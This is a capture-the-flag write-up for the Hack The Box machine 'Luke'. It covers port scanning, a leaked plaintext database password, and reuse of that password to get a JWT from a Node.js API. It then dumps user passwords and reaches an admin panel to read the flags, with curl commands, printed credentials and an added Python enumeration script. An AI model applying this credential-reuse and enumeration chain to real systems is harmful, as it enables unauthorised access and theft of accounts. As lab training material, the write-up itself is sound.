Hack The Box Write Up - Luke
Hacker Orientation
Box number three for me! I was itching to get another shell.
OS: FreeBSD
Difficulty: Medium
Points: 30
Release: 25 May 2019
IP: 10.10.10.137
nmap:
# Nmap 7.70 scan initiated Tue Aug 27 18:14:27 2019 as: nmap -sV -o nmap_sv.out 10.10.10.137
Nmap scan report for 10.10.10.137
Host is up (0.069s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3+ (ext.1)
22/tcp open ssh?
80/tcp open http Apache httpd 2.4.38 ((FreeBSD) PHP/7.3.3)
3000/tcp open http Node.js Express framework
8000/tcp open http Ajenti http control panel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Aug 27 18:16:47 2019 -- 1 IP address (1 host up) scanned in 140.70 seconds
Breaking it down
FTP is kind of interesting, but 80, 3000, and 8000 are all commonly used for HTTP 🤔
Enumerate
This sounds like a job for dirbuster! I ran it against 80, 3000, and 8000, then proceeded to poke around all of those pages to get acquainted with the entire environment.
While poking through the dirbuster output, I found a page that exposed a database credential (the MySQL root password, in plain text): http://10.10.10.137/config.php
$dbHost = 'localhost';
$dbUsername = 'root';
$dbPassword = 'Zk6heYCyv6ZE9Xcg';
$db = "login";
$conn = new mysqli($dbHost, $dbUsername, $dbPassword,$db) or die("Connect failed: %s\n". $conn -> error);
Down the rabbit hole we go
I can’t tell you how many places I tried to use that credential. Or tried cracking it 😅
After many hours of running into a wall, I found that you needed to use that credential with the ‘admin’ user against the /Login endpoint of the Node.js API on port 3000.
curl --header "Content-Type: application/json" --request POST --data '{"password":"Zk6heYCyv6ZE9Xcg", "username":"admin"}' http://10.10.10.137:3000/Login
This returned a JWT. Decoding the token below (no secret needed to read it) shows the header is alg HS256 and the payload is username admin with an exp 24 hours after iat, so it stays usable for a day of poking. It is then sent as a bearer token to the rest of the endpoints dirbuster turned up.
Use that token to look at /users
curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY2OTYyMjQyLCJleHAiOjE1NjcwNDg2NDJ9.CydKxM9wI-Kb11P2-2dVvCQj2U6YKO6zmBZK8pBX3ps" http://10.10.10.137:3000/users
[
{"ID":"1","name":"Admin","Role":"Superuser"},
{"ID":"2","name":"Derry","Role":"Web Admin"},
{"ID":"3","name":"Yuri","Role":"Beta Tester"},
{"ID":"4","name":"Dory","Role":"Supporter"}
]
Then again for each user (/users/$user, lower-case name). The curl below is the admin request; the results for all four users are collected here:
curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY2OTYyMjQyLCJleHAiOjE1NjcwNDg2NDJ9.CydKxM9wI-Kb11P2-2dVvCQj2U6YKO6zmBZK8pBX3ps" http://10.10.10.137:3000/users/admin
[
{"name":"Admin","password":"WX5b7)>/rp$U)FW"},
{"name":"Derry","password":"rZ86wwLvx7jUxtch"},
{"name":"Dory","password":"5y:!xa=ybfe)/QD"},
{"name":"Yuri","password":"bet@tester87"},
]
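The login and enumeration steps above are easy to type as one-off curls, but the thing I wish I had done first is look inside the token before spraying it around. Below is an added example (my own code, not part of the original write-up and not the box author's API) that decodes the JWT from the page without verifying it, reports its algorithm, user and expiry, and then walks /users and /users/<name> with the bearer header the write-up uses. Assumptions: the exact JSON shape of the /Login response is not shown on the page, so login() just returns the raw body for you to read the token out of; the per-user path is the lower-cased name field (the page shows /users/admin for the Admin entry); the script name luke_api.py is made up.

```python
import base64
import json
import sys
from datetime import datetime, timezone
from urllib import request

# The admin JWT shown in the write-up above (copied from the page, not freshly minted).
TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY2OTYyMjQyLCJleHAiOjE1NjcwNDg2NDJ9."
    "CydKxM9wI-Kb11P2-2dVvCQj2U6YKO6zmBZK8pBX3ps"
)


def b64url_decode(segment: str) -> bytes:
    # JWT segments are base64url with the '=' padding stripped; restore it first.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt_unverified(token: str) -> dict:
    """Split a JWT into header, payload and signature length WITHOUT verifying it.

    This is for inspection only (what alg, which user, when it expires); it must
    never be used to decide whether to trust a token.
    """
    header_b64, payload_b64, sig_b64 = token.split(".")
    return {
        "header": json.loads(b64url_decode(header_b64)),
        "payload": json.loads(b64url_decode(payload_b64)),
        "signature_len": len(b64url_decode(sig_b64)),  # 32 bytes for an HS256 HMAC
    }


def token_lifetime_seconds(token: str) -> int:
    claims = decode_jwt_unverified(token)["payload"]
    return claims["exp"] - claims["iat"]


def token_is_expired(token: str, now: int) -> bool:
    # 'now' is a Unix timestamp so the check is reproducible offline.
    return now >= decode_jwt_unverified(token)["payload"]["exp"]


def login(base_url: str, username: str, password: str) -> str:
    """POST the same JSON body the write-up used to /Login; returns the raw response body.

    Assumption: the page does not show the response format, so no parsing is done here.
    """
    body = json.dumps({"username": username, "password": password}).encode()
    req = request.Request(
        f"{base_url}/Login",
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    with request.urlopen(req, timeout=10) as resp:
        return resp.read().decode()


def get_json(base_url: str, path: str, token: str):
    req = request.Request(
        f"{base_url}{path}",
        headers={"Accept": "application/json", "Authorization": f"Bearer {token}"},
    )
    with request.urlopen(req, timeout=10) as resp:
        return json.load(resp)


def enumerate_users(base_url: str, token: str) -> dict:
    """Walk /users, then /users/<name> for every listed account.

    Assumption: the per-user path is the lower-cased 'name' field, as the page's
    /users/admin request for the 'Admin' entry suggests.
    """
    results = {}
    for entry in get_json(base_url, "/users", token):
        name = entry["name"].lower()
        results[name] = get_json(base_url, f"/users/{name}", token)
    return results


if __name__ == "__main__":
    # Usage (hypothetical script name): python3 luke_api.py http://10.10.10.137:3000 <jwt>
    # Inspect the token first; a dead token only produces 401s during enumeration.
    base, tok = sys.argv[1], sys.argv[2]
    claims = decode_jwt_unverified(tok)
    exp = datetime.fromtimestamp(claims["payload"]["exp"], tz=timezone.utc)
    print(f"alg={claims['header']['alg']} user={claims['payload'].get('username')} exp={exp.isoformat()}")
    if token_is_expired(tok, int(datetime.now(tz=timezone.utc).timestamp())):
        sys.exit("token expired; call login() again and paste the new token")
    print(json.dumps(enumerate_users(base, tok), indent=2))
```

The decode is deliberately signature-blind: on the offensive side that is all you need to learn the claim names and lifetime, and on the defensive side it is exactly why a JWT must never be treated as secret data, since anyone holding it can read the username and expiry.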
Down ALL of the other rabbit holes
Better use the creds across every login portal I saw from dirbuster!
Upper case, lower case, all caps. Even tried all 4 of the passwords for each user.
Light at the end of the tunnel
Eventually, I successfully authenticated to /management with Derry's credentials, then looked at /management/config.json, which contained another password:
password "KpMasng6S5EtTy9Z"
Log in to the Ajenti control panel on port 8000 and use its built-in terminal to view /home/derry/user.txt and /root/root.txt.
Before concluding this writeup, what snags did I run into?
SO MANY RABBIT HOLES. But that’s not necessarily a bad thing. I had to be persistent (and try harder) to get through this one.
Closing thoughts
Flags were a little underwhelming once you got to the CMS, but this was a great exercise in enumeration and a test of will.
H4d3s, you made me question my sanity. 🙃